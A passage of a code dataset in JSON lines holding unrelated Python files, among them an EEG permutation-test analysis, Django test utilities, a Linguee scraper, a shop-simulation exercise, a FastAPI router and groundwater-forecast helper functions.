journal_lst[:-2]})\r\n","repo_name":"liqiming-whu/FirstAuthor-Mine","sub_path":"Article/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75192750186","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 28 13:23:17 2023\n\n@author: claire.dussard\n\"\"\"\n\nimport mne\nimport pathlib  # needed for pathlib.Path below\n\nfrom functions.load_savedData import *\nfrom handleData_subject import createSujetsData\nimport numpy as np\nimport os\nimport pandas as pd\n\nessaisMainSeule,essaisMainIllusion,essaisPendule,listeNumSujetsFinale,allSujetsDispo,listeDatesFinale,SujetsPbNomFichiers,dates,seuils_sujets = createSujetsData()\n\n# move into the lustre data directory\nos.chdir(\"../../../../\")\nlustre_data_dir = \"_RAW_DATA\"\nlustre_path = pathlib.Path(lustre_data_dir)\nos.chdir(lustre_path)\n\nliste_rawPathPendule = createListeCheminsSignaux(essaisPendule,listeNumSujetsFinale, allSujetsDispo,SujetsPbNomFichiers,listeDatesFinale,dates)\nliste_rawPathMain = createListeCheminsSignaux(essaisMainSeule,listeNumSujetsFinale, allSujetsDispo,SujetsPbNomFichiers,listeDatesFinale,dates)\nliste_rawPathMainIllusion = createListeCheminsSignaux(essaisMainIllusion,listeNumSujetsFinale, allSujetsDispo,SujetsPbNomFichiers,listeDatesFinale,dates)\n\nliste_tfrPendule = load_tfr_data_windows(liste_rawPathPendule,\"\",True)\nliste_tfrMain = load_tfr_data_windows(liste_rawPathMain,\"\",True)\nliste_tfrMainIllusion = load_tfr_data_windows(liste_rawPathMainIllusion,\"\",True)\n\ndef copy_three_tfrs(liste_tfrPendule,liste_tfrMain,liste_tfrMainIllusion):\n#avoid having to reload from scratch after every ANOVA (instances modified in place)\n    liste_tfr_pendule = []\n    liste_tfr_main = []\n    liste_tfr_mainIllusion = []\n    for tfr_p,tfr_m,tfr_mi in zip(liste_tfrPendule,liste_tfrMain,liste_tfrMainIllusion):\n        liste_tfr_pendule.append(tfr_p.copy())\n        liste_tfr_main.append(tfr_m.copy())\n        liste_tfr_mainIllusion.append(tfr_mi.copy())\n    return liste_tfr_pendule,liste_tfr_main,liste_tfr_mainIllusion\n\ndef data_freq_tTest_perm(elec,fmin,fmax,tmin,tmax,liste_tfr_main,liste_tfr_mainIllusion,liste_tfr_pendule):\n    mode_baseline = 'logratio'\n    n_sujets = len(liste_tfr_pendule)\n    baseline = (-3,-1)\n    #compute baseline (first because after we crop time)\n    for tfr_m,tfr_mi,tfr_p in zip(liste_tfr_main,liste_tfr_mainIllusion,liste_tfr_pendule):\n        tfr_m.apply_baseline(baseline=baseline, mode=mode_baseline, verbose=None)\n        tfr_mi.apply_baseline(baseline=baseline, mode=mode_baseline, verbose=None)\n        tfr_p.apply_baseline(baseline=baseline, mode=mode_baseline, verbose=None)\n    #crop time & frequency\n    for tfr_mainI,tfr_main,tfr_pendule in zip(liste_tfr_mainIllusion,liste_tfr_main,liste_tfr_pendule):\n        tfr_mainI.crop(tmin = tmin,tmax=tmax,fmin = fmin,fmax = fmax)\n        tfr_main.crop(tmin = tmin,tmax=tmax,fmin = fmin,fmax = fmax)\n        tfr_pendule.crop(tmin = tmin,tmax=tmax,fmin = fmin,fmax = fmax)\n    #subset electrode\n    for tfr_mainI,tfr_main,tfr_pendule in zip(liste_tfr_mainIllusion,liste_tfr_main,liste_tfr_pendule):\n        tfr_mainI.pick_channels([elec])\n        tfr_main.pick_channels([elec])\n        tfr_pendule.pick_channels([elec])\n    # create the ANOVA table (to do: extend to several electrodes at once)\n    tableau_mainPendule = np.zeros(shape=(n_sujets,fmax-fmin+1))# 23 = number of subjects\n    tableau_mainMainIllusion = np.zeros(shape=(n_sujets,fmax-fmin+1))\n    tableau_main = np.zeros(shape=(n_sujets,fmax-fmin+1))\n    tableau_pendule = 
np.zeros(shape=(n_sujets,fmax-fmin+1))\n tableau_mainIllusion = np.zeros(shape=(n_sujets,fmax-fmin+1))\n for i in range(n_sujets):#sujets\n print(\"sujet\"+str(i))\n #ecraser forme electrodes\n liste_tfr_pendule[i].data = np.mean(liste_tfr_pendule[i].data,axis=0)\n liste_tfr_main[i].data = np.mean(liste_tfr_main[i].data,axis=0)\n liste_tfr_mainIllusion[i].data = np.mean(liste_tfr_mainIllusion[i].data,axis=0)\n #pool time\n powerFreq_pendule = np.median(liste_tfr_pendule[i].data,axis=1)#OK donc dim = freq x time\n powerFreq_main = np.median(liste_tfr_main[i].data,axis=1)\n powerFreq_mainI = np.median(liste_tfr_mainIllusion[i].data,axis=1)\n print(powerFreq_main)\n mainMoinsPendule_i = powerFreq_main - powerFreq_pendule\n print(mainMoinsPendule_i)\n mainMoinsMainIllusion_i = powerFreq_main - powerFreq_mainI\n for j in range(fmax-fmin+1):#freq\n print(\"freq\"+str(fmin+j))\n tableau_mainPendule[i][j] = mainMoinsPendule_i[j]\n print(mainMoinsPendule_i[j])\n tableau_mainMainIllusion[i][j] = mainMoinsMainIllusion_i[j]\n tableau_main[i][j] = powerFreq_main[j]\n tableau_pendule[i][j] = powerFreq_pendule[j]\n tableau_mainIllusion[i][j] = powerFreq_mainI[j]\n return tableau_mainPendule,tableau_mainMainIllusion,tableau_main,tableau_pendule,tableau_mainIllusion\n\nobj_channels=[\"Fp1\",\"Fp2\",\"F7\",\"F3\",\"Fz\",\"F4\",\"F8\",\"FC5\",\"FC1\",\"FC2\",\"FC6\",\"T7\",\"C3\",\"Cz\",\"C4\",\"T8\",\n\"CP5\",\"CP1\",\"CP2\",\"CP6\",\"P7\",\"P3\",\"Pz\",\"P4\",\"P8\",\"O1\",\"Oz\",\"O2\"]\nliste_pendule = []\nliste_main = []\nliste_mainIllusion = []\n\n#reorder channels\n\nfor elec in obj_channels:\n print(\"ELEC \"+elec)\n liste_tfr_pendule,liste_tfr_main,liste_tfr_mainIllusion = copy_three_tfrs(liste_tfrPendule,liste_tfrMain,liste_tfrMainIllusion)\n tableau_mainPendule,tableau_mainMainIllusion,tableau_main,tableau_pendule,tableau_mainIllusion = data_freq_tTest_perm(elec,3,84,2.5,25.5,liste_tfr_main,liste_tfr_mainIllusion,liste_tfr_pendule)\n liste_mainIllusion.append(tableau_mainIllusion)\n liste_main.append(tableau_main)\n liste_pendule.append(tableau_pendule)\n \n \n \n#now get the p values\ndef get_pvalue_allElec_allFreq(liste_condition,npermut):\n n_sujets = liste_condition[0].shape[0]\n liste_suj_data = []\n for suj in range(n_sujets):\n for elec in range(28):\n print(\"suj\"+str(suj))\n liste_suj_data.append(liste_condition[elec][suj])\n \n fullTableTest_condition = np.zeros(shape=(n_sujets,82*28))\n for i in range(n_sujets):#sujet\n for j in range(28):#electrodes\n fullTableTest_condition[i:i+1,j*82:(j+1)*82] = liste_suj_data[(28*i)+j]\n \n T0, p_values , H0 = mne.stats.permutation_t_test(fullTableTest_condition,npermut)\n significant_freqs = p_values <= 0.05\n print(significant_freqs)\n \n readable_pValue_table = np.zeros(shape=(28,82)) \n for i in range(28):#elec\n for j in range(82):#freq\n readable_pValue_table[i,j] = p_values[(82*i)+j] \n return readable_pValue_table\n\nreadable_pValue_table_pendule = get_pvalue_allElec_allFreq(liste_pendule,20000) \nreadable_pValue_table_main = get_pvalue_allElec_allFreq(liste_main,20000)\nreadable_pValue_table_mainIllusion = get_pvalue_allElec_allFreq(liste_mainIllusion,20000) \n\nheader_row = [\"Channels\\\\freq\"] + list(np.arange(3,85,1)) # Adding an empty cell for the top-left corner\nheader_col = [\"Channels\\\\freq\"] + obj_channels\n\n\n# Creating a DataFrame from the data\ndf_pval_pendule = pd.DataFrame(readable_pValue_table_pendule, index=header_col[1:], columns=header_row[1:])\ndf_pval_main = pd.DataFrame(readable_pValue_table_main, 
index=header_col[1:], columns=header_row[1:])\ndf_pval_mainIllusion = pd.DataFrame(readable_pValue_table_mainIllusion, index=header_col[1:], columns=header_row[1:])\n\npath = \"C:/Users/claire.dussard/OneDrive - ICM/Bureau/rdom_scriptsData/allElecFreq_VSZero/versionJuin2023_elecFixed/\"\n\ndf_pval_pendule.to_csv(path+\"p_pend.csv\")\ndf_pval_main.to_csv(path+\"p_main.csv\")\ndf_pval_mainIllusion.to_csv(path+\"p_mainIllusion.csv\")\n\n#now get cohen's d\n\ndef get_dcohen_allElec_allFreq(liste_condition):\n ndarray = np.zeros(shape=(28,82))\n for elec in range(28):\n mean = np.mean(liste_condition[elec],axis=0)\n print(mean)\n stdev = np.std(liste_condition[elec],axis=0)\n print(stdev)\n dcohen = mean/stdev\n ndarray[elec]=dcohen\n \n return ndarray\nd_p = get_dcohen_allElec_allFreq(liste_pendule)\nd_m = get_dcohen_allElec_allFreq(liste_main)\nd_mi = get_dcohen_allElec_allFreq(liste_mainIllusion)\n\n# Creating a DataFrame from the data\ndf_d_pendule = pd.DataFrame(d_p, index=header_col[1:], columns=header_row[1:])\ndf_d_main = pd.DataFrame(d_m, index=header_col[1:], columns=header_row[1:])\ndf_d_mainIllusion = pd.DataFrame(d_mi, index=header_col[1:], columns=header_row[1:])\n\ndf_d_pendule.to_csv(path+\"dcohen_pend.csv\")\ndf_d_main.to_csv(path+\"dcohen_main.csv\")\ndf_d_mainIllusion.to_csv(path+\"dcohen_mainIllusion.csv\")\n\n\n#check what we get\npath = \"C:/Users/claire.dussard/OneDrive - ICM/Bureau/rdom_scriptsData/allElecFreq_VSZero/versionJuin2023_elecFixed/\"\n\np_pend = pd.read_csv(path+\"p_pend.csv\").iloc[:, 1:]\np_main = pd.read_csv(path+\"p_main.csv\").iloc[:, 1:]\np_mIll = pd.read_csv(path+\"p_mainIllusion.csv\").iloc[:, 1:]\n\np_pend = p_pend.to_numpy()\np_main = p_main.to_numpy()\np_mIll = p_mIll.to_numpy()\n\npend = pd.read_csv(path+\"dcohen_mainIllusion.csv\").iloc[:, 1:]\nmain = pd.read_csv(path+\"dcohen_main.csv\").iloc[:, 1:]\nmIll = pd.read_csv(path+\"dcohen_pend.csv\").iloc[:, 1:]\n\npend = pend.to_numpy()\nmain = main.to_numpy()\nmIll = mIll.to_numpy()\n\n\nimport imagesc\nimagesc.plot(pend,cmap=\"Blues\")\nimagesc.plot(main,cmap=\"Blues\")\nimagesc.plot(mIll,cmap=\"Blues\")\n\nraw_signal.plot(block=True)\n\npvalue = 0.05/3 \nmasked_p = np.ma.masked_where((p_pend > pvalue) , pend)\nmasked_m = np.ma.masked_where((p_main > pvalue) , main)\nmasked_mi = np.ma.masked_where((p_mIll > pvalue) , mIll)\n\nimagesc.plot(-masked_p,cmap=\"Blues\")\nimagesc.plot(-masked_m,cmap=\"Blues\")\nimagesc.plot(-masked_mi,cmap=\"Blues\")\n\nimport matplotlib.pyplot as plt\nelec_leg = pd.read_csv(path+\"dcohen_mainIllusion.csv\").iloc[:, 0]\ngridspec_kw={'width_ratios': [1,1,1],\n 'height_ratios': [1],\n 'wspace': 0.05,#constrained_layout=True\n 'hspace': 0.05}\nfig, axs = plt.subplots(1,3, sharey=True,sharex=True, figsize=(20, 7),gridspec_kw=gridspec_kw,constrained_layout=True)\nvmin = 0.9\nvmax = 2.1\nimg = axs[0].imshow(-masked_p, extent=[0, 1, 0, 1],cmap=\"Blues\", aspect='auto',interpolation='none',vmin=vmin,vmax=vmax,label=\"pendulum\")\naxs[0].text(0.12, 1.02, 'Virtual pendulum')\n\naxs[1].imshow(-masked_m, extent=[0, 1, 0, 1],cmap=\"Blues\", aspect='auto',interpolation='none',vmin=vmin,vmax=vmax)\naxs[1].text(0.12, 1.02, 'Virtual hand')\naxs[2].imshow(-masked_mi, extent=[0, 1, 0, 1],cmap=\"Blues\", aspect='auto',interpolation='none',vmin=vmin,vmax=vmax)\naxs[2].text(0.12, 1.02, 'Virtual hand with vibrations')\nfig.colorbar(img, location = 'right')\nelecs = elec_leg \n#plt.subplots_adjust(wspace=0.2, hspace=0.05)\nfreq_leg = np.arange(3,84,4)\nfreq_leg_str =[str(f) for f in 
freq_leg]\nplt.xticks(np.linspace(0,1,21),freq_leg_str)\nx8Hz = 0.061\nx30Hz = 0.34\ncol = \"black\"\nls = \"--\"\nlw = 0.7\nfor ax in axs.flat:\n ax.axvline(x=x8Hz,color=col,ls=ls,lw=lw)\n ax.axvline(x=x30Hz,color=col,ls=ls,lw=lw)\nplt.yticks(np.linspace(1/(len(elecs)*2.5),1-1/(len(elecs)*2.5),len(elecs)),elecs.iloc[::-1])\nfor ax in axs.flat:\n for elecPos in [0.107,0.286,0.428,0.608,0.75,0.9293]:\n ax.axhline(y=elecPos,color=\"dimgray\",lw=0.25)\n#plt.tight_layout(pad=0.04) \nraw_signal.plot(block=True)#specifier le x\n","repo_name":"cdussard/M2data_analysis","sub_path":"analyse_M2/saison_2/permutationFtestV2.py","file_name":"permutationFtestV2.py","file_ext":"py","file_size_in_byte":11076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35960130641","text":"# Standard Library\nimport functools\n\n# Third Party Stuff\nfrom django.conf import settings\nfrom django.core.files.base import ContentFile\nfrom django.db.models import signals\nfrom django.utils.six import BytesIO\nfrom PIL import Image\n\n\ndef signals_switch():\n pre_save = signals.pre_save.receivers\n post_save = signals.post_save.receivers\n\n def disconnect():\n signals.pre_save.receivers = []\n signals.post_save.receivers = []\n\n def reconnect():\n signals.pre_save.receivers = pre_save\n signals.post_save.receivers = post_save\n\n return disconnect, reconnect\n\n\ndisconnect_signals, reconnect_signals = signals_switch()\n\n\ndef set_settings(**new_settings):\n \"\"\"Decorator for set django settings that will be only available during the\n wrapped-function execution.\n\n For example:\n @set_settings(FOO='bar')\n def myfunc():\n ...\n\n @set_settings(FOO='bar')\n class TestCase:\n ...\n \"\"\"\n def decorator(testcase):\n if type(testcase) is type:\n namespace = {\n 'OVERRIDE_SETTINGS': new_settings, 'ORIGINAL_SETTINGS': {}}\n wrapper = type(testcase.__name__, (SettingsTestCase, testcase),\n namespace)\n else:\n @functools.wraps(testcase)\n def wrapper(*args, **kwargs):\n old_settings = override_settings(new_settings)\n try:\n testcase(*args, **kwargs)\n finally:\n override_settings(old_settings)\n\n return wrapper\n\n return decorator\n\n\ndef override_settings(new_settings):\n old_settings = {}\n for name, new_value in list(new_settings.items()):\n old_settings[name] = getattr(settings, name, None)\n setattr(settings, name, new_value)\n return old_settings\n\n\nclass SettingsTestCase(object):\n @classmethod\n def setup_class(cls):\n cls.ORIGINAL_SETTINGS = override_settings(cls.OVERRIDE_SETTINGS)\n\n @classmethod\n def teardown_class(cls):\n override_settings(cls.ORIGINAL_SETTINGS)\n cls.OVERRIDE_SETTINGS.clear()\n\n\ndef get_dict_from_list_where(my_list, key, value):\n \"\"\"see: http://stackoverflow.com/a/7079297/782901\"\"\"\n return next((item for item in my_list if item[key] == value), None)\n\n\ndef create_image(storage, filename, size=(100, 100), image_mode='RGB', image_format='PNG'):\n \"\"\"\n Generate a test image, returning the filename that it was saved as.\n\n If ``storage`` is ``None``, the BytesIO containing the image data\n will be passed instead.\n \"\"\"\n data = BytesIO()\n Image.new(image_mode, size).save(data, image_format)\n data.seek(0)\n if not storage:\n return data\n image_file = ContentFile(data.read())\n return storage.save(filename, 
image_file)\n","repo_name":"CuriousLearner/nexus","sub_path":"tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"21228388674","text":"# try makes it so that you can have the interpreter not show the normal error message, and instead print out a string\n# that the creator sets\ntry:\n age = int(input('Age: '))\n income = 20000\n risk = income / age\n print(age)\nexcept ZeroDivisionError:\n print('Age cannot be zero')\nexcept ValueError:\n print('Invalid value')","repo_name":"tylertamalunas/MoshYoutube","sub_path":"Mosh-youtube/Lessons/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"348070840","text":"import pandas as pd\r\n\r\n\r\ndef read_parse_csv(filename):\r\n print(f\"Lettura di '{filename}'...\")\r\n with open(filename, \"r\") as f:\r\n df = pd.read_csv(f,sep=',',dtype='unicode')\r\n dataDict = df.to_dict(\"records\")\r\n print(\"Lettura del file CSV completata\")\r\n return dataDict\r\n","repo_name":"elesci97/Progetto_Smarthome","sub_path":"Client/csvReader.py","file_name":"csvReader.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26238868822","text":"from network.scene import Scene as _Scene\n\nfrom .entity import Actor, Entity\nfrom .resources import ResourceManager\nfrom .timers import TimerManager\nfrom .physics import create_network_physics_manager\n\n\nfrom os import path\n\n\nclass Scene(_Scene):\n\n def __init__(self, world, name):\n super().__init__(world, name)\n\n self.timer_manager = TimerManager()\n self.resource_manager = ResourceManager(path.join(world.root_filepath, name))\n self.network_physics_manager = create_network_physics_manager(world)\n self.entity_builder = self._create_entity_builder()\n\n self.messenger.add_subscriber(\"replicable_created\", self._on_replicable_created)\n self.messenger.add_subscriber(\"replicable_removed\", self._on_replicable_destroyed)\n\n def _create_entity_builder(self):\n raise NotImplementedError\n\n def _on_replicable_created(self, replicable):\n if isinstance(replicable, Entity):\n self.entity_builder.load_entity(replicable)\n\n if isinstance(replicable, Actor):\n self.network_physics_manager.add_actor(replicable)\n\n def _on_replicable_destroyed(self, replicable):\n if isinstance(replicable, Actor):\n self.network_physics_manager.remove_actor(replicable)\n\n if isinstance(replicable, Entity):\n self.entity_builder.unload_entity(replicable)\n\n def _on_tick(self):\n self.network_physics_manager.tick()\n self.timer_manager.update(1 / self.world.tick_rate)\n\n def tick(self):\n self.messenger.send(\"tick\")\n self._on_tick()\n self.messenger.send(\"post_tick\")\n","repo_name":"agoose77/PyAuthServer","sub_path":"game_system/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"7630955155","text":"import requests\nimport codecs\nfrom bs4 import BeautifulSoup\nimport time\n\n#pip install beautifulsoup4 requests codecs\n\nword_array = [\n\"Hochzeit\",\n\"weinen\",\n\"Verlobter\",\n\"worüber\",\n\"aufgeregt\",\n\"furchtbar\",\n\"überhaupt\",\n\"ständig\",\n\"niesen\",\n\"während\",\n]\n\noutput_text = \"\"\nfor word in 
word_array:\n    time.sleep(3)\n    url_base = \"https://www.linguee.com/english-german/search?source=german?destination=english?&query=\" + word\n    page = requests.get(url_base)\n    soup = BeautifulSoup(page.text, \"html.parser\")\n    print(word)\n    results = soup.find(id=\"dictionary\")\n\n    translations = results.find_all(\"div\", class_=\"lemma featured\")\n    output_text += word + \";\\\"\"\n    for translation in translations:\n        output_text += \"\\n    - Position: \" + translation.find(\"span\", class_=\"tag_wordtype\").text.strip()\n        output_text += \"\\n    DE: \" + translation.find(\"a\", class_=\"dictLink\").text.strip()\n        output_text += \"\\n    EN: \" + translation.find(\"a\", class_=\"dictLink featured\").text.strip()\n\n        examples = translation.find_all(\"span\", class_=\"tag_e\") \n        if examples:\n            output_text += \"\\n    Examples: \"\n            for example in examples:\n                output_text += \"\\n    DE: \" + example.find(\"span\", class_=\"tag_s\").text.strip()\n                output_text += \"\\n    EN: \" + example.find(\"span\", class_=\"tag_t\").text.strip()\n                if examples.index(example) == len(examples)-1:\n                    output_text += \"\\n    \"\n                else:\n                    output_text += \"\\n    -\"\n            else:\n                output_text += \"\\n
    \"\n \n output_text += \"\\\"\\n\"\n \n\n\n#print(output_text)\n\nf = codecs.open(\"sample.txt\", \"w\", \"utf-8\")\nf.write(output_text)\n\nwrite_history = codecs.open(\"translator_history.txt\", \"a\", \"utf-8\")\nwrite_history.write(\"\\n\" + str(word_array))\n","repo_name":"dvrocha/de-lernen","sub_path":"translatorv2.py","file_name":"translatorv2.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30398138690","text":"class InsufficientFundsError(Exception):\r\n pass\r\n\r\n\r\ndef simulate_shop():\r\n items = {\r\n \"aPPlE\": 50,\r\n \"bAnaNa\": 75,\r\n \"laPtoP\": 150\r\n }\r\n\r\n customer_balance = 100\r\n\r\n print(\"Welcome to the shop!\")\r\n print(\"Here are the available items and their prices:\")\r\n for item, price in items.items():\r\n print(f\"{item}: £{price}\")\r\n print(\"Type 'exit' to leave the shop.\")\r\n\r\n try:\r\n for _ in range(3):\r\n option = input(\"Enter the item you want to purchase: \")\r\n\r\n if option == \"exit\":\r\n print(\"Thank you for visiting the shop!\")\r\n return\r\n\r\n if option not in items:\r\n raise ValueError(\"Invalid input! Please select a valid item.\")\r\n\r\n price = items[option]\r\n\r\n if price > customer_balance:\r\n raise InsufficientFundsError(\"You don't have enough money to purchase this item.\")\r\n\r\n customer_balance -= price\r\n print(f\"Here's your {option}!\")\r\n\r\n except InsufficientFundsError as e:\r\n print(str(e))\r\n response = input(\"Do you have more money? (yes/no): \")\r\n\r\n if response.lower() == \"yes\":\r\n extra_money = float(input(\"Enter the additional amount of money you have: \"))\r\n customer_balance += extra_money\r\n print(\"Additional money added to your balance.\")\r\n simulate_shop()\r\n else:\r\n print(\"Sorry, you don't have enough money to continue shopping.\")\r\n\r\n except ValueError as e:\r\n print(str(e))\r\n simulate_shop()\r\n\r\n else:\r\n print(\"You have reached the maximum number of items to purchase.\")\r\n print(\"Thank you for visiting the shop!\")\r\n\r\n finally:\r\n print(\"Exiting the shop.\")\r\n\r\n\r\nsimulate_shop()\r\n","repo_name":"Heying778/foundation-homework4","sub_path":"shop.py","file_name":"shop.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74587831787","text":"from fastapi import APIRouter, BackgroundTasks\n\nfrom app.repository import QuestionRepository\nfrom app.schemas.question import QuestionRequest, QuestionResponse\n\nquestion_router = APIRouter(prefix=\"/questions\", tags=[\"Questions\"])\n\n\n@question_router.post('/', response_model=QuestionResponse)\nasync def get_question(\n data: QuestionRequest,\n questions: QuestionRepository,\n background_tasks: BackgroundTasks,\n):\n background_tasks.add_task(questions.add_records, data.questions_num)\n return await questions.get_last_record()\n","repo_name":"Dzigr/quiz","sub_path":"app/routers/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70232071146","text":"#мы исходим из предположения, что пиксели квадратные\nresolution = str(input('enter your screen resolution (separated with a space): '))\nresolution = resolution.split()\nfirst_resolution = int(resolution[0])\nsecond_resolution = int(resolution[1])\nratio = first_resolution / 
second_resolution\n\nscreen_size = float(input('enter your screen size: '))\n\nstandard_ratio_height = first_resolution / 16 * 9\n#дальше надо найти диагональ этой части (как?)\n\n#a2 + b2 = c2\n#для экрана 16:9 будет так: 337x2 = diag^2\n\n\n\n\n#if ratio == (16 / 9):\n #print('16:9... classics')\n#elif ratio < (16 / 9):\n #we have what I call a mac screen\n #print('you apple-loving scrum')\n#else:\n #print('netflix n chill?')\n\n#print(first_resolution, second_resolution, screen_size)\n","repo_name":"nowhenman/LearningGit","sub_path":"mac screens.py","file_name":"mac screens.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41912406683","text":"import pygame\r\nimport math\r\n\r\nclass View_top():\r\n def __init__(self, data):\r\n self.total_data=data\r\n self.id=data[\"id\"]\r\n self.pos=data[\"pos\"]\r\n self.num=data[\"num\"]\r\n self.active=data[\"active\"]\r\n self.color=(0, 255, 255)\r\n self.border_color=(0, 0, 0)\r\n self.active_border_color=(255, 0, 0)\r\n self.border_radius=2\r\n self.radius=15\r\n\r\n\r\n def set_parameters(self, parameters= [(0, 255, 255), (0, 0, 0), (255, 0, 0), 15, 2]):\r\n self.color=parameters[0]\r\n self.border_color=parameters[1]\r\n self.active_border_color=parameters[2]\r\n self.radius=parameters[3]\r\n self.border_radius=parameters[4]\r\n\r\n\r\n def is_clicked(self, click):\r\n dist = math.floor(math.sqrt((self.pos[0] - click[0]) * (self.pos[0] - click[0])\r\n + (self.pos[1] - click[1]) * (self.pos[1] - click[1])))\r\n if dist <= self.radius+self.border_radius:\r\n return self.id\r\n elif dist <= (self.radius+self.border_radius) * 5:\r\n return \"near\"\r\n return None\r\n\r\n\r\n def draw(self, screen):\r\n if self.active:\r\n pygame.draw.circle(screen, self.active_border_color, self.pos, self.radius+self.border_radius)\r\n else:\r\n pygame.draw.circle(screen, self.border_color, self.pos, self.radius+self.border_radius)\r\n pygame.draw.circle(screen, self.color, self.pos, self.radius)\r\n myfont = pygame.font.SysFont('Arial', self.radius)\r\n textsurface = myfont.render(str(self.num), False, (0, 0, 0))\r\n text_width = textsurface.get_width()\r\n text_height = textsurface.get_height()\r\n screen.blit(textsurface,(self.pos[0] - text_width/2,self.pos[1]-text_height/2))\r\n\r\n","repo_name":"Nmachekhin/graphs_builder","sub_path":"view_top.py","file_name":"view_top.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31565515367","text":"\"\"\"\nFunctions for various purposes in GWLF.\n\nAuthor:\n Brogan McCawley (16/08/2021)\n\"\"\"\n\nimport os\nimport pandas as pd\nfrom .exceptions import DirectoryNotEmptyError\nfrom .exceptions import DiscontinuousTimeseriesError\n\n\ndef check_empty_dir(dir_path: str) -> None:\n \"\"\"\n Checks if 'dir_path' is empty and raises DirectoryNotEmptyError if not\n \"\"\"\n if len(os.listdir(dir_path)) != 0:\n raise DirectoryNotEmptyError(f'\\n\\nMake sure \"{dir_path}\" is empty.\\n')\n\n\ndef check_timeseries_continuity(df: pd.DataFrame, freq: str = 'D') -> None:\n \"\"\"\n Checks if dataframe index is a continuous timeseries (no missing rows)\n \"\"\"\n diffs = pd.date_range(\n start=df.index[0], end=df.index[-1], freq=freq).difference(df.index)\n if len(diffs) > 0:\n raise DiscontinuousTimeseriesError(str(diffs))\n\n\ndef line_prepender(file_path: str, line: str) -> None:\n \"\"\"Prepend lines at the start of a 
text file\"\"\"\n with open(file_path, 'r+') as f:\n content = f.read()\n f.seek(0, 0)\n f.write(line.rstrip('\\r\\n') + '\\n' + content)\n\n\ndef clear_dir(dir_path: str) -> None:\n \"\"\"\n Check if 'dir_path' is empty and delete any files present upon user request\n \"\"\"\n files = os.listdir(dir_path)\n\n if len(files) != 0:\n while True:\n print(f\"\\nThe directory '{dir_path}' is not empty.\")\n answer = input(\n \"Do you wish to delete all files located here? (Y/N)\")\n\n if answer.upper() == 'Y':\n for f in files:\n os.remove(os.path.join(dir_path, f))\n break\n\n elif answer.upper() == 'N':\n raise DirectoryNotEmptyError()\n\n else:\n continue\n\n\ndef countlines(start, lines=0, header=True, begin_start=None):\n if header:\n print('{:>10} |{:>10} | {:<20}'.format('ADDED', 'TOTAL', 'FILE'))\n print('{:->11}|{:->11}|{:->20}'.format('', '', ''))\n\n for thing in os.listdir(start):\n thing = os.path.join(start, thing)\n if os.path.isfile(thing):\n if thing.endswith('.py'):\n with open(thing, 'r') as f:\n newlines = f.readlines()\n newlines = len(newlines)\n lines += newlines\n\n if begin_start is not None:\n reldir_of_thing = '.' + thing.replace(begin_start, '')\n else:\n reldir_of_thing = '.' + thing.replace(start, '')\n\n print('{:>10} |{:>10} | {:<20}'.format(\n newlines, lines, reldir_of_thing))\n\n for thing in os.listdir(start):\n thing = os.path.join(start, thing)\n if os.path.isdir(thing):\n lines = countlines(thing, lines, header=False, begin_start=start)\n\n return lines\n","repo_name":"BMcCawley/GWLForecaster","sub_path":"GWLForecaster_dev/session_resources/model_resources/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"34682851384","text":"import numpy as np\nimport pandas as pd\nfrom babs_visualizations import usage_stats\n\ndef question_3(data):\n \"\"\"\n This function will check that the sample data has been wrangled properly.\n \"\"\"\n\n n_correct = 0\n\n # Check that there are a correct number of lines in the dataset.\n if data.shape[0] != 27345:\n print(\"Expected 27,345 data points, found only {:d}.\".format(data.shape[0]))\n else:\n n_correct += 1\n\n # Check that the durations have been converted into terms of minutes.\n data_duration_stats = usage_stats(data, verbose = False)\n expected_duration_stats = np.array([6.816667, 10.716667, 17.28333])\n if not np.allclose(data_duration_stats, expected_duration_stats):\n print(\"Duration statistics do not match expected units (minutes).\")\n if np.allclose(data_duration_stats, np.array([409, 643, 1037])):\n print(\" It looks like the units are still in terms of seconds.\")\n elif np.allclose(data_duration_stats, np.array([24520, 38580, 62220])):\n print(\" It looks like you might have used the wrong operator in your conversion.\")\n print(\" Remember that there are 60 seconds in each minute.\")\n else:\n n_correct += 1\n\n # Check that the timestamps have been wrangled properly.\n expected_time_vals = {'start_month': [25243, 2102],\n 'start_hour': [2851, 2291, 2219, 2171, 2131, 1976,\n 1833, 1799, 1791, 1644, 1359, 1269,\n 1071, 797, 644, 440, 394, 276,\n 153, 65, 55, 45, 42, 29],\n 'weekday': [4712, 4493, 4370, 3860, 3637, 3138, 3135]}\n\n for column in expected_time_vals.keys():\n col_data = data[column].value_counts().values\n n_values = len(col_data)\n n_values_expected = len(expected_time_vals[column])\n if not n_values == n_values_expected:\n print(\"Wrong number of 
